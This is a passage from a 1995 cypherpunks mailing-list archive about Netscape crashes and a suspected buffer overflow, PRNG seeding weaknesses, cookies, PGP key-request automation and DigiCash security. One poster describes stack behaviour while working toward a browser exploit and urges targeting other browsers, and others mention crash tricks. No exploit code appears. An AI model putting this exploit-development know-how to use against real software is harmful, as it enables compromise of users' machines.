Ok, noted. Maybe I should try to write down this "idea" for a proper review?
Hmmm.

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Wed, 27 Sep 95 07:27:40 PDT
To: Deranged Mutant <rrothenb@ic.sunysb.edu>
Subject: Re: PGP and FBI?
In-Reply-To: <199509270409.AAA00688@libws4.ic.sunysb.edu>
Message-ID: <Pine.SUN.3.91.950927101916.10713A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Sep 1995, Deranged Mutant wrote:

> There's some sort of documentary on WBAI 99.5 FM out of NYC now.
> They're talking about PGP and right wing militias... the guy being
> interviewed called PGP a "one time pad system" and doesn't understand
> it... *sigh*

Any more details on this?  I know people who do shows on BAI.  What
was the date/time of the show?  If this is true, it's pretty sad,
especially since BAI's well known for being a "political" station.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael H. Warfield <mhw@wittsend.com>
Date: Wed, 27 Sep 95 07:44:29 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape for OS/2, when? (Re: Another Netscape Bug)
In-Reply-To: <44a4kt$jda@tera.mcom.com>
Message-ID: <m0sxxW0-0000vwC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein enscribed thusly:
> 
> In article <199509261223.JAA01800@bud.peinet.pe.ca>, sentiono@cycor.ca (Sentiono Leowinata) writes:
> > On Tue, 26 Sep 1995 05:58:19 -0400 (EDT) you wrote:
> > 
> > >> It's not an exploit script, but you can find an auto crash "animation"
> > >> for Ray's discovered bug on 
> > >>   http://hplyot.obspm.fr/~dl/netscapesec/c1.html
> > >> (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/)
> > >Crashes the 16-bit Windows version 1.1N.
> > >DCF
> > 
> > Same here. For more information (not Netscape related), Web Explorer
> > 1.02 for OS/2 also crashes for the long URL.
> > I wish Netscape will port it to OS/2 (already ask them, but no comment
> > from Netscape). I don't try it on Netscape 1.1N as it doesn't run
> > reliably under Win-OS/2 (10 min -> crash! ;)
> 
>   My understanding is that OS/2 is supposed to be windows compatible,
> as in "better Windows than Windows".  If our windows app doesn't run
> on OS/2, then isn't it IBM's bug, not ours?
> 

	Well, I'll admit that the MTBF (Mean Time Between Failures) on
OS/2 would seem to be a little bit worse that the MTBGPF (Mean Time Between
General Protection Faults) on Windows, but not much.  If I run Netscape
continuously for more than 20 minutes or so, I'm almost certain to get a
GPF.  I've even got a few tricks which can do it immediately.  When it
first comes up, Maximize the window, then hit stop, then hit another link,
all before the Netscape Home Page is fully loaded.  Bang!  "The application
Netscape has caused a General Protection Fault in module...."  I've learned
to let the dust settle before touching too much.  BTW - This is true in
1.1N (16 bits) as well as 1.2N (32 bits) and even occures in the "purchased"
browser (the office bought a copy).  Has been experienced on a half dozen
machines or so, 386, 486, and Pentium, with differing video drivers.

	I also occasionally experience a segmentation violation and core
dump while using Netscape 1.1N on Solaris.  No very frequently, maybe once
every week or so, and I use UNIX A LOT MORE than Windows, so stability
is actually even better.

	A GPF on Windows is roughly equivalent to a segmentation violation
under UNIX since they both involve a pointer misuse resulting in an
illegal memory reference.  Main real difference is that a GPF on UNIX
rarely takes out the operating system while under Windows a GPF is a
general indication that something has committed randome acts of terrorism
and Windows itself may be compromised.

> 	--Jeff

> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.

-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 27 Sep 95 10:27:39 PDT
To: Travis Corcoran <cypherpunks@toad.com
Subject: Re: Timothy C. May: Mini-mailbombs and Warning Letters
Message-ID: <ac8ed65501021004cc69@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:28 PM 9/27/95, Travis Corcoran wrote:

>As the author of the package in question, I would like to point out:
>
>(1) the email msg Tim refers to (hereafter refered to by me as "query-mail")
>                was a request for information, not a warning

I've received several of these, not just the one Travis sent.

I don't sign my messages, never have, so I see no way this "agent" Travis
ran could find such a signed message from me.m (It's conceivable he found
an old--really old--message with a faked-up sig, as perhaps for a
demonstration or spoof I was doing, but I'm skeptical. In any case, I
suspect only an "automated searcher" could find the one or two messages
that may look like this. If Travis produces the message here, I'm sure this
will be what the situation is.)

>(4) checking right now, I find that the finger command does indeed
>                fail to get a public key from Tim's address.
>
>(5) checking right now, I find that BAL's keyserver does indeed fail
>                to give any key with the address "tcmay@got.net"


Like I said, I don't sign messages. My PGP 2.0 key was signed at the second
CP meeting and, they tell me, submitted on the original MIT ring.
"tcmay@netcom.com" was my e-mail address at that time.


>A question: in a situation like this one, where an individual signed a
>message with a key then did not make a key with the return address of
>his message available either through his .plan, or a keysever (the two
>de facto standards), what next step -if any- do people think is more
>appropriate than sending mail to the individual asking them for a copy
>of the key ?

Ignore it. Why hassle people who have no plan or finger configurations? (I
don't have a shell account.) Besides, people who really want to communicate
with me with PGP simply ask for it.

If you don't like this, fine. But don't robo-interrogate and send robo-warnings.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David_A Wagner <daw@CS.Berkeley.EDU>
Date: Wed, 27 Sep 95 10:48:23 PDT
To: cwe@it.kth.se (Christian Wettergren)
Subject: Re: Exchange random numbers (was: Re: netscape's response)
In-Reply-To: <199509270913.KAA17943@piraya.electrum.kth.se>
Message-ID: <199509271747.KAA01043@lagos.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> | > Giving out contribution: 
> | >      MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote
> | > Taking in contribution : 
> | >      my_seed = my_seed XOR 
> | >      ((select_low_bits(remote_contrib, contrib_width) << contrib_area)

So here's another attack on this scheme which I noticed today.
I'll assume you're using the Netscape/RSAREF PRNG:

	prng() {
		increment(my_seed);
		return(MD5(my_seed));
	}

Then an attacker can send you ``1'' as contribution.  This will
xor ``1 << contrib_area'' into your seed.  With probability 1/2,
this will be the same as subtracting ``1 << contrib_area'' from
your seed -- and in this case, your PRNG will repeat after
``1 << contrib_area'' more outputs.  This is much worse than the
expected 1 << 128 cycle length.


So this is an example of why it's dangerous to xor in values
*chosen by your adversary* to your seed.


> Could you quantify how powerful a related-key attack is, compared to
> some other kind of attack? I don't know anything about this kind of 
> attack, do you have any references?

I don't know about any work on related-key attacks on stream ciphers.
For block ciphers, related-key attacks are much stronger than other
attacks. (e.g. DES can be broken with ~ 2^28 related key queries and
about ~ 2^28 off-line computation steps)


Here's some references on related key attacks on block ciphers.  If
anyone can find any other work in this area, let me know!


@inproceedings{subkeys-important,
        author = {Edna K. Grossman and Bryant Tuckerman},
        title = {Analysis of a Weakened {Feistel}-like Cipher},
        booktitle = {1978 International Conference on Communications},
        pages = {46.3.1--46.3.5},
        publisher = {Alger Press Limited},
        year = {1978},
        annote = {Feistel ciphers with identical subkeys in each round
                        are very weak}
}

@article{related-keys-1,
        author = {Robert Winternitz and Martin Hellman},
        title = {Chosen-key Attacks on a Block Cipher},
        journal = {Cryptologia},
        year = {1987},
        volume = {{XI}},
        number = {1},
        month = {January},
        pages = {16--20}
}

@inproceedings{related-keys-2,
        author = {Eli Biham},
        title = {New Types of Cryptanalytic Attacks Using Related Keys},
        booktitle = {Advances in Cryptology: {EUROCRYPT} '93},
        pages = {398--409},
        publisher = {Springer-Verlag},
        year = {1994}
}



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: william@interval.net (William C. Archibald)
Date: Wed, 27 Sep 95 08:51:43 PDT
To: rfb@lehman.com
Subject: Re: [NOISE] Re: Easter Eggs
Message-ID: <9509271550.AA13262@entropy.interval.net>
MIME-Version: 1.0
Content-Type: text/plain



alano@teleport.com <Alan Olsen> ]:
>    obNetscapeHack: There is a feature called a "cookie file" in
>    Netscape that is ripe for exploitation as a security leak.  If you
>    are using a Netscape server (and you may not even need that), you
>    can feed all sorts of information into it without the user's
>    knowlege.  I have heard of one page that overloads the cookie file
>    until the machine runs out of drive space.  I am sure that there
>    are other exploitable holes there...  Any takers?
Umm. The spec says that there is a maximum cookie size and a maximum
number of cookies that should be sent. I'll be the last to claim
that Netscape created a 'standards-compliant' product, but they
have at least recognized that these things aren't supposed to be
infinitely large.

rfb@lehman.com <Rick Busdiecker> ]:
> Yikes!  That sounds really bad.  Do you have any more information on
> this?  For example, can the server write to anything other than
> $HOME/.netscape-cookies?  If I write protect that file, but it's still
> owned by me, will Netscape still modify it?
The server can't write anything. Cookies are returned as HTTP 
response headers, which will either be:
	A) Ignored by a cookie-ignorant browser, or, 
	B) Processed by a cookie-aware browser.

In either case, the cookie cache reading/writing is done by the
browser. If the browser is running as 'you' then it can access
files that 'you' own. If you write protect it against yourself, then
its likely that your user-agent (Netscape) running as 'you' can't
write to that file.

Cheers!
w. archibald
=





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@acm.org
Date: Wed, 27 Sep 95 08:23:32 PDT
To: eb@comsec.com
Subject: Re: The Fortezza random number generator is not trustworthy
In-Reply-To: <199509262156.OAA21527@comsec.com>
Message-ID: <9509271504.AA09830@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Tue, 26 Sep 1995 14:56:54 -0700
>From: Eric Blossom <eb@comsec.com>
>

>I was under the impression that a seed for the RNG is loaded into the
>Fortezza at initialization time.  This would make me think that they
>are using a cryptographically strong PRNG.  This would give data that
>appears random, but is completely determined by the initial state.
>
>I suspect that the "seed keys" provided by the two agencies used to
>program the Clipper chips has the same properties.  This makes the
>question about how does the NSA get access to the key escrow database
>moot.  They don't need access.  They know a priori all the unit keys.


My favorite Clipper master key generation algorithm, in the sacrificial
laptop in the Mykotronix vault, is:

	\[ K(n) = H_1(R_1, R_2, n) = H_2( n ) \]

where $H_2$ is a damned good one-way function, as highly classified as
DERD's original description of the PRNG in the chip programming process
indicated, $n$ is the chip's serial number, $R_1$ and $R_2$ are the ranno
seeds provided by NIST and Treasury folks and $K(n)$ is the master key for
chip n.


 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Corcoran <tjic@OpenMarket.com>
Date: Wed, 27 Sep 95 08:21:38 PDT
To: cypherpunks@toad.com
Subject: [ PROPOSED NEW STANDARD ] "I-like-encrypted-mail" tag
Message-ID: <199509271521.LAA12800@cranmore.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain



Summary:

	This message tosses out an idea for conveying within an { email |
	usenet } message the datum "the author of this message prefers to
	receive PGP encrypted communications" in a standard machine-readable
	form.

Motivation:

	In the most recent version of my

		<a href="http://www.openmarket.com/personal/tjic/emacs.html">
	 mail-secure.el package
		</a>

	I included a feature that allows users to maintain a list of
	correspondants who prefer to receive encrypted mail.  This list is
	then used by the package at email-send-time to see if a piece of email
	should be encrypted.

	I and others on this list include tags along the lines of "PGP
	encrypted mail preferred" in our .sigs.  It occured to me that this
	could be automated: 

	(1) a standard "I-like-encrypted-mail" tag could be defined
	(2) cryptography-capable mail tools could scan incoming messages for
			this tag and add the originators of any message containing the
			tag to a list
	(3) cryptography-capable mail tools could then use this list when
			sending (as mail-secure.el currently does).


Possible Implementations:

	A couple of different methods occur to me to implement step #1:

	(a) a new header could be defined and added to messages (as per
	section 3 of 

		<a href="http://www.cis.ohio-state.edu/htbin/rfc/rfc1505.html">
	RFC 1505
		</a>

	), along the lines of 

		X-Rcv-Security-Prefered: PGP-Encryption

	(b) a certain keyword or phrase could be defined that could be
	inserted in the .sig block of a message.  Ex:

		--
		foo@bar.com
		PGP-Encrypted-Mail-Preferred

	I am tempted to suggest something either compatible with or in the
	spirit of 

		<a href="http://www.eit.com/creations/s-http/draft-ietf-wts-shttp-00.txt">
	SHTTP 
		</a>

	negotiation blocks, but restrain myself from doing so because this

	(a) seems needlessly baroque for the information being conveyed
	(b) falsely implies that a negotiation is taking place, when in fact a
		mere advisory is being issues.

Security concerns:

	A temporary denial-of-service/annoyance attack could be mounted by an
	adversary who issues one forged message from individual A with the
	"PGP-encrypted-mail prefered tag" present, and then puts a fake key on
	a keyserver.  Anyone who uses a tag-aware mail-reading package and
	sees this message would send future mail to individual A encrypted in
	a manner that didn't allow A to read it.


Please mail or post any thoughts on this proposal.

Thanks,

TJIC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <ploshin@tiac.net>
Date: Wed, 27 Sep 95 08:54:38 PDT
To: "'cypherpunks@toad.com>
Subject: RE: "Notes" to be Eclipsed by "Netscape"
Message-ID: <01BA8CD0.30988CA0@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May[SMTP:tcmay@got.net] wrote:

>At 6:52 PM 9/25/95, Jon Lasser wrote:
>
>>Perhaps the Notes pricing scheme is sooo outrageous (by the standards of
>>a student like myself, and probably most others, if it's still anything
>>like it was at the 1.0 release) that mostpeople have had zero opportunity
>>to examine the program, let alone really have time to play with it?
>
>I've never even _seen_ a copy of Notes running on any machine, nor do I
>know directly of _any_ of my colleagues who has. (Not saying nobody has, of
>course, just that I can't find anyone I know well who has.)

I've used Notes myself (and have written about how it and Notes add-in apps are used).  Yes, it was overpriced, but they came out with a less-featured, less-expensive version (which I haven't seen).  Based on my experiences, it appears to be a choice for rigid/business management/TQM types in big corporations, among others.

>I've been following the news on Notes for at least several years, even to
>the point of buying some Lotus stock several years ago on the strength of
>what I had read about Notes. (Alas, I sold it soon thereafter, before a
>run-up in price.)
>
>My point? Notes is nearly invisible in the non-corporate community I now
>hang out in.

No question about that.  You need a dedicated server, server software and, at least a year ago, it all cost something like $500+ per seat to setup.  Plus, it doesn't do you any good unless you are working in a workgroup.

>Who knows what weaknesses or bugs it has in it. Folks on our list probably
>don't have much familiarity with it.

I only just subscribed to this list, and by all rights should probably spend more time lurking; that said, Notes includes encryption and digital signature.

>My hunch is that, as the "Wall Street Journal" reported yesterday, that IBM
>overpaid for Lotus, that the notion of Notes becoming the universal
>collaboration/communication option is flawed.

There has been growing sentiment among certain sectors that workgroup computing is the wave of the future.  Unfortunately, given IBM's track record, their purchase of Lotus seems to doom it to a fate similar to OS/2: an excellent product with a track record, with a small but fervent following, which will soon be eclipsed by some less-featured, newer product that makes someone a pot of money (like CollabraShare).

Notes end users have always seemed to feel it had too much power and was not easy to figure out how to use; Notes programmers love it, and there are lots of addins.  With Notes going to IBM, Netscape seems to have made another very clever move--while it still doesn't justify the overall stock price, it does justify the rise associated with that move.

>(I've been saying for a while that the Web serves that purpose better, and
>that Web browsers will likely edge out Notes. Apparently I was hardly
>prescient, as Netscape recently bought Collabra, which is pushing that
>point exactly.)

Notes uses replication to distribute data across networks; there are better ways to have people compute remotely in my opinion too (not sure WWW is THE answer, but it certainly is one of them).

>--Tim May

-Pete Loshin
 peter@world.std.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Wed, 27 Sep 95 08:55:24 PDT
To: dmandl@panix.com
Subject: Re: PGP and FBI?
In-Reply-To: <Pine.SUN.3.91.950927101916.10713A-100000@panix.com>
Message-ID: <199509271555.LAA14563@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> On Wed, 27 Sep 1995, Deranged Mutant wrote:
> 
> > There's some sort of documentary on WBAI 99.5 FM out of NYC now.
> > They're talking about PGP and right wing militias... the guy being
> > interviewed called PGP a "one time pad system" and doesn't understand
> > it... *sigh*
> 
> Any more details on this?  I know people who do shows on BAI.  What
> was the date/time of the show?  If this is true, it's pretty sad,
> especially since BAI's well known for being a "political" station.

I forget the name of the show, it was on Tues. night (last night) after
Pacifica (around midnight)... I wrote and sent the message while I was
hearing it.  I stopped after bleating out the message and listened to
some of the show, which was about right wing militias, Weaver case, Okla bomb,
etc... turns out I missed the short part where the person being interviewed
(duh, should've written his name down) mentioned PGP, which he also said
stood for "Pretty Good Program".  Wish I had more details of the show...

(BTW, I'm temporarily off the c'punks list)

Rob

> 
>    --Dave.
> 
> --
> Dave Mandl
> dmandl@panix.com
> http://wfmu.org/~davem
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Wed, 27 Sep 95 09:16:36 PDT
To: cypherpunks@toad.com
Subject: Re: getting netscape to support the remailers
In-Reply-To: <9509261951.AA01873@ch1d157nwk>
Message-ID: <199509271614.MAA07080@mobster.cit.ge.com>
MIME-Version: 1.0
Content-Type: text/plain


andrew_loewenstern@il.us.swissbank.com said:
> Netscape doesn't need to support remailers explicitly since Netscape 
> will be   supporting Java.  I think a remailer client is within 
> Java's capabilities...    Anyone disagree? 

Depends on how Netscape impliments Java. Under HotJava it could concievably be 
done, although Security setting may restrict the browser from doing SMTP...

Actually, I would suspect it might be possible to do using forms, using a 
mailto: form.  Hmmmmmmmm.......

Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Corcoran <tjic@OpenMarket.com>
Date: Wed, 27 Sep 95 09:29:01 PDT
To: cypherpunks@toad.com
Subject: Re: Timothy C. May: Mini-mailbombs and Warning Letters
Message-ID: <199509271628.MAA12868@cranmore.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Message-Signature-Date: Wed Sep 27 12:28:47 1995

>  Date: Tue, 19 Sep 1995 10:57:32 -0700
>  To: cypherpunks@toad.com
>  From: tcmay@got.net (Timothy C. May)
>  Subject: Mini-mailbombs and Warning Letters
>  
>  I've received a couple of "automatically generated" pieces of
>  e-amil which tell me that, in the generator's opinion, something is
>  wrong with my public key, or it could not be found at the keyserver
>
>  As the saying goes, "Sigh."
>  
>  Being on a list with 700 subscribers, some of whom are running
>  increasingly sophisticated automatic checking agents, I foresee an
>  increase in these "warning letters" from their checking agents who
>  feel posts are not adequate in some way.

As the author of the package in question, I would like to point out:

(1) the email msg Tim refers to (hereafter refered to by me as "query-mail") 
		was a request for information, not a warning

(2) the query-mail did not refer to any inadequacy in the original
		posting.  It explicitly refers to the fact that the original poster
		PGP signed a message, but did not make the public key to verify the
		message easilly available.

(3) the query-mail was sent to an actual person only after several
		non-intrusive methods had failed.

(4) checking right now, I find that the finger command does indeed
		fail to get a public key from Tim's address.

(5) checking right now, I find that BAL's keyserver does indeed fail
		to give any key with the address "tcmay@got.net"

(6) the query-mail is not a purely robotic spam: there is a human in the loop

(7) the keyserver used by query-mail generator defaults, not to some
		arbitrary preference, but to BAL's keyserver, which is the most used
		server that I know of, and which (to the best of my knowledge)
		receives regular updates from several other keyservers.

(8) given that "increasingly sophisticated automatic checking agents"
		can make it much easier for individuals to gather keys, check
		incoming messages, and sign or encrypt outgoing messages, it
		seems that such "agents" tend to increase the usage and
		acceptance of cryptography, which is a good thing for all
		concerned.


A question: in a situation like this one, where an individual signed a
message with a key then did not make a key with the return address of
his message available either through his .plan, or a keysever (the two
de facto standards), what next step -if any- do people think is more
appropriate than sending mail to the individual asking them for a copy
of the key ?

>  I'm dealing with it the same way I'm dealing with the few people
>  who have something in their MIME setup that triggers my mailer
>  (Eudora Pro 2.1) to treat their text as attachments. Namely, by
>  filtering them out.

This is a fine anarchistic solution to the problem (and that's a
compliment!), from your point of view (although, I hasten to point
out, not quite as good as submitting a key with a valid address on it
to a keyserver).  If anyone else wishes to ignore requests for keys,
the subject string to add to your email kill-file is

		"please send me your PGP public key"


Because I do think that automating parts of the the
encryption/signing/verification/decryption/key-retrieval process will
make cryptography more wide-spread (in so far as there is not a
backlash against this automation), I do not want to ignore the
concerns of others.

So...how would people do things differently if they were writing this
sort of software?  One idea proposed by Jiri Baum
<jirib@cs.monash.edu.au> is to find the key ID used to sign the
message, and then query the keyserver with this ID, as opposed to an
email string.  I'm not sure whether or not I like this idea (for
security reasons), but that question is moot, as it seems to be
impossible given the current keyservers.

Any other suggestions or ideas?

- -- 
TJIC (Travis J.I. Corcoran)       http://www.openmarket.com/personal/tjic/

                             Member EFF, GOAL, NRA.
                 opinions (TJIC) != opinions (employer (TJIC))
         "Buy a rifle, encrypt your data, and wait for the Revolution!"
	 PGP encrypted mail preferred.   Ask me about mail-secure.el for emacs.



-----BEGIN PGP SIGNATURE-----
Version: 2.6
Comment: auto-signed by mail-secure.el v 0.998 using mailcrypt.el
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMGl7wIJYfGX+MQb5AQErpQP/XvoJ0QF4TEtPhJuxk5ifsUlXrl4RSvyP
dFh1MkTQWl4/D+jFHI0MW+gyi2/EmzxEW+8zYUCLENBIq8H3QJgQDnQ9NRM3JiGU
c9yd4EeE9bH8r+KppF5WfJfuE4hJ6YFRO0sdal0oJs3RfuF2ZIHoLoKPR5G97EGv
dmWg2J784ZM=
=xnv7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 27 Sep 95 09:46:25 PDT
To: "Jeff Weinstein" <jsw@netscape.com>
Subject: It's Wednesday
Message-ID: <199509271646.MAA06516@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Do you know where your new Netscape is?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Wed, 27 Sep 95 10:15:37 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: PGP and FBI?
In-Reply-To: <199509270409.AAA00688@libws4.ic.sunysb.edu>
Message-ID: <Pine.A32.3.91.950927131445.25408G-100000@MACAW.ZOO.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 27 Sep 1995, Deranged Mutant wrote:

> 
> There's some sort of documentary on WBAI 99.5 FM out of NYC now.
> They're talking about PGP and right wing militias... the guy being
> interviewed called PGP a "one time pad system" and doesn't understand
> it... *sigh*

Well there really is no reason that you cant use PGP as a hash function 
or its random function to produce OTP's.

Ben.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMGmGpL5ALmeTVXAJAQGJ0AL/dCS9dbl5NBHohG6VrUgU2CdBP99AsYvD
7TN0hV8pJrsgsy1OyuCHAlP5rFBlUHiTsWUJfYKAhaRSgF4MLMfEpgKbc58BNkhh
vXq3qfeIt/cRgiMbpuWpbtO9GyPzRSgR
=vB06
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: donlonm@ccmail.mcclellan.af.mil
Date: Wed, 27 Sep 95 10:23:54 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <9508278122.AA812233405@ax.asc-yf.wpafb.af.mil>
MIME-Version: 1.0
Content-Type: text/plain


Ray,

You wrote:

>I've found a Netscape bug which I suspect is a buffer overflow and 
>may have the potential for serious damage. If it is an overflow bug, 
>then it may be possible to infect every computer which accesses a web 
>page with Netscape. 

Is there any way to avoid/prevent this problem by changing options in 
NetScape?

Thanks,

Mike D.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marcel van der Peijl" <bigmac@digicash.com>
Date: Wed, 27 Sep 95 05:28:04 PDT
To: ecm@ai.mit.edu
Subject: NO weak links in DigiCash system!!!
Message-ID: <199509271227.NAA14451@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


> I have a couple of problems/complaints with your ecash project.
> When I was sent my Acct ID and Passwd they were sent to me plain text
> instead of being PGP-encrypted first.  This means that some malicious
> hacker could have intercepted the e-mail message and stolen the
> free cyber-bucks you were so generous as to give me.  Second, on the
> WWW-page where one downloads the software it does not seem to do a secure
> connection between my browser and your server (on netscape there is
> a small key in the lower-left hand corner that is supposed to show when
> one is securely connected to a secure server).  So someone could sniff my
> password from the transaction when I GET the software.  Also When I'm
> buying/selling things it would be smart for all parties involved to
> be using PGP, and I think you should stress this point more in your page.
> Otherwise this is another vulnerable point in your system IMHO.

Let's get this straight before spreading more of these vicious 
rumours that can easily get misinterpreted.

DigiCash is an R&D company developing ecash. We license out our 
technology to banks. We are running the trial, but only have limited 
resources to do so. This may result in long waiting time for accounts 
or no answer on a tech support mail. (We are of course trying to 
prevent this).
In a real-money system, the password can of course not be sent out in 
plain mail. Either it has to be transferred out-of-band (phone, 
paper) or PGP'd. But that would require at least ten people answering 
the phones, sending snailmail, etc. We do not have the resources to 
do so, so we send out the password plain. A malicious hacker may 
snatch the password and open the account for you and steal your 
cb$100. This, however, is not related to the security of the 
transactions once you open the account! The password is only for 
starting up the account.
And of course downloading on a secure server is not relevant. The 
software is the same for everyone! It is just not put out for public 
downloading because it would mean a hundred times more people asking 
for tech support. It would be more secure if we used different 
passwords for downloading and for opening the accounts but again, 
that would give a LOT more problems.
PGP does not add any security in the payment system. Ecash is already 
secure.

Feel free to ask us the questions before publicly posting. It will 
prevent misunderstandings and libel lawsuits.

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// "If you had to tell the Whole Truth, you'd never shut up."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 27 Sep 95 13:54:53 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: WSJ on Netscape Hole 3
Message-ID: <v02120d06ac8f74e7796e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Somebody wrote:
>> With Netscape 1.1 the state of the stack is much more dynamic, in
>> particular the user can be viewing documents at an arbitary depth in
>> the "web tree", each recursion will increase the stack pointer (or
>> decrease with some architectures) There is no way of knowing for
>> certain where you code will end up and thus no way to reliably alter
>> the return address on the stack to execute your arbitary code.
>

I just tested this under Solaris 2.4 and it "turns out not to be
the case." I approached my "bad" URL from a variety of other places,
passing through various other pages, and the stack structure was
still the same when I clicked on the bad guy. The big problem I'm
having on this platform is the windowing register system on the SPARC
architecture, which interacts in weird ways with the debugger.

The lack of determinacy about where the stack is loaded in global
memory _does_ seem to be a much bigger problem on the Mac, which
is still not anything approaching a multi-tasking OS. Under Unix,
proceses get their own address space to play in, which is always
the same; on Macs, with their weird relocatable heaps, you never
know where stuff is going to get loaded.

I wonder how this is handled in Windows 95....

As for objections about how worthwhile this is, it's pretty clear
that a patch will be available for this problem before we can finish
and publicize an exploit. This is not, however, the last piece of
network software that will contain problems of this sort, and it is
a good idea to build up expertise in this area. I'd also suggest going
after some of the other browsers... I know, for instance, that AOL's
browser dies horribly on these same sort of URLs.

Good luck, all.

Doug






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 27 Sep 95 14:04:54 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Easter Eggs
Message-ID: <199509272104.OAA16793@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:35 AM 9/27/95 -0400, you wrote:
>    Date: Tue, 26 Sep 1995 12:59:54 -0700
>    From: Alan Olsen <alano@teleport.com>
>    
>    You also need X windows to find the Mozilla animated icon hack on
>    Jammie Zawinski's page.
>    ^^^^^^
>
>Just for the record, that's Jamie.

Hey!  I never said I could type at 1am!  Yes, I know.  #%#$#%ing spelling
flames.  Grumble. Grumble. (BTW, the compass egg will show up in any page
with /jwz/ in the url.  The "anim" tag on his page is bogus.)

>    obNetscapeHack: There is a feature called a "cookie file" in
>    Netscape that is ripe for exploitation as a security leak.  If you
>    are using a Netscape server (and you may not even need that), you
>    can feed all sorts of information into it without the user's
>    knowlege.  I have heard of one page that overloads the cookie file
>    until the machine runs out of drive space.  I am sure that there
>    are other exploitable holes there...  Any takers?
>
>Yikes!  That sounds really bad.  Do you have any more information on
>this?  For example, can the server write to anything other than
>$HOME/.netscape-cookies?  If I write protect that file, but it's still
>owned by me, will Netscape still modify it?

The url for the spec is: http://home.netscape.com/newsref/std/cookie_spec.html.

The cookie overload probibly only worked under 1.1 and before.  The spec
claims to have limits on the number of cookies you can have.  But between
this and the server API, I am sure that a hole or two has to exist.  This is
an area not explored by many.  (For good reason.  It is usually poorly
documented...)

OBParanoia:  Want something to really make you worried.  Imagine this for a
web page...  A local law enforcement agency decides that it wants to nab a
few of those "computer preverts".  They create a web site that has a cgi
script that looks for providers from a list.  It then has a link that shows
up only for people at one of those sites to "get hot porn pics".  They then
collect enough machine names and other info, then use the collected
information to obtain a warrent to seize the ISP's logs to match users with
machines. (Most browsers to not report e-mail address.) In the current
hysteria I do not see this scenerio too far off.  Makes you wonder what
